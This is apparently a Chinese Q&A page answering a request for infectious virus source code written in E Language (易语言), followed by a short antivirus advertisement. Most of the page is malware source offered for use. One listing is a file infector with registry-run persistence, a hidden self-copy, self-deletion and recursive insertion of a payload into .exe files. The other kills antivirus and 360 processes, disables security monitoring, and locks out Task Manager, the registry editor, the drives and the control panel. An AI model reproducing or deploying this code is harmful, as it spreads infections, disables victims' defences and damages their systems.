本文目录一览:
跪求:易语言编写的具有感染性的病毒源代码..
.版本 2
.支持库 eAPI
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
.如果真 (取运行目录 () ≠ 读环境变量 (“Windir”))
复制文件 (取运行目录 () + “\” + 取执行文件名 (), 读环境变量 (“Windir”) + “\penguin.exe”)
运行 (“Cmd /c Attrib +H +S ” + 读环境变量 (“Windir”) + “\penguin.exe”, 真, 1)
运行 (读环境变量 (“Windir”) + “\penguin.exe”, 假, )
写到文件 (读环境变量 (“Windir”) + “penguin.bat”, 到字节集 (“@echo off” + #换行符 + “Taskkill /f /im ” + 取执行文件名 () + #换行符 + “Del ” + 取当前目录 () + “\” + 取执行文件名 () + #换行符 + “Del %0” + #换行符 + “Exit”))
写到文件 (读环境变量 (“Windir”) + “\penguin.bat”, 到字节集 (子文本替换 (子文本替换 (到文本 (读入文件 (读环境变量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
运行 (读环境变量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真结束
.如果真 (取运行目录 () = 读环境变量 (“Windir”))
写注册项 (#本地机器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 读环境变量 (“Windir”) + “\penguin.exe”)
写到文件 (读环境变量 (“Windir”) + “Infection.exe”, #感染)
运行 (读环境变量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真结束
驱动器 = 取驱动器列表 ()
.版本 2
.子程序 搜寻
.参数 目录, 文本型
.局部变量 文件号
.局部变量 文件名, 文本型
处理事件 ()
.如果真 (取文本右边 (目录, 1) ≠ “\”)
目录 = 目录 + “\”
.如果真结束
文件名 = 寻找文件 (目录 + “*.exe”, )
.判断循环首 (文件名 ≠ “”)
输出调试文本 (目录 + 文件名)
文件号 = 打开文件 (删首尾空 (目录 + 文件名), #读写, #无限制)
插入字节集 (文件号, #图标)
关闭文件 (文件号)
文件名 = 寻找文件 (, )
.判断循环尾 ()
文件名 = 寻找文件 (目录 + “*.*”, #子目录)
.判断循环首 (文件名 ≠ “”)
.如果真 (取文本左边 (文件名, 1) ≠ “.”)
搜寻 (目录 + 文件名)
.如果真结束
文件名 = 寻找文件 (, #子目录)
.判断循环尾 ()
原创,不要外传=.=
易语言病毒代码
.版本 2
.局部变量 变量, 整数型
置现行时间 (到时间 (“2056年1月1日”))
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
' 绕过360监控
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
运行 (“taskkill /f /im 360tray.exe”, 假, 1) ' 结束360进程
' 修改关联
写注册项 (1, “.txt\”, “jpegfile”)
写注册项 (1, “.inf\”, “jpegfile”)
写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 0) ' 隐藏文件和文件夹
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) ' 禁用任务管理器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1) ' 禁用控制面板
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) ' 禁用注册表
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) ' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务
写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) ' 隐藏所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) ' 禁止所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) ' 隐藏文件夹选项
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) ' 将桌面对象隐藏
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) ' 隐藏开始中的关机
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) ' 隐藏开始中的搜索
' 写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1) ' 隐藏主页选项组
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1) ' 隐藏IE文件菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1) ' 隐藏收藏夹菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1) ' 禁用IE打印功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1) ' 隐藏Internet选项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1) ' 禁止IE查看源文件
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3) ' 禁用IE下载功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1) ' 禁止右键关联菜单
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode”, 1) ' 禁止“重新启动计算机切换到MS-DOS方式”
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 禁止显示“注销”
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu”, 1) ' 禁止文档菜单
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 去掉“开始”选单中的“登录”项
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, 1) ' 禁止使用鼠标右键
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”, 1) ' 禁止修改控制面版
易语言破解版写的程序有木马,怎么解决?
您好:
一般破解版的软件编写的程序都会被恶意加入病毒代码的,建议您不要使用这种不安全的变成软件,并为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以的哦,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,是完全可以帮助您查杀病毒而且保护您的电脑的哦。
您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台: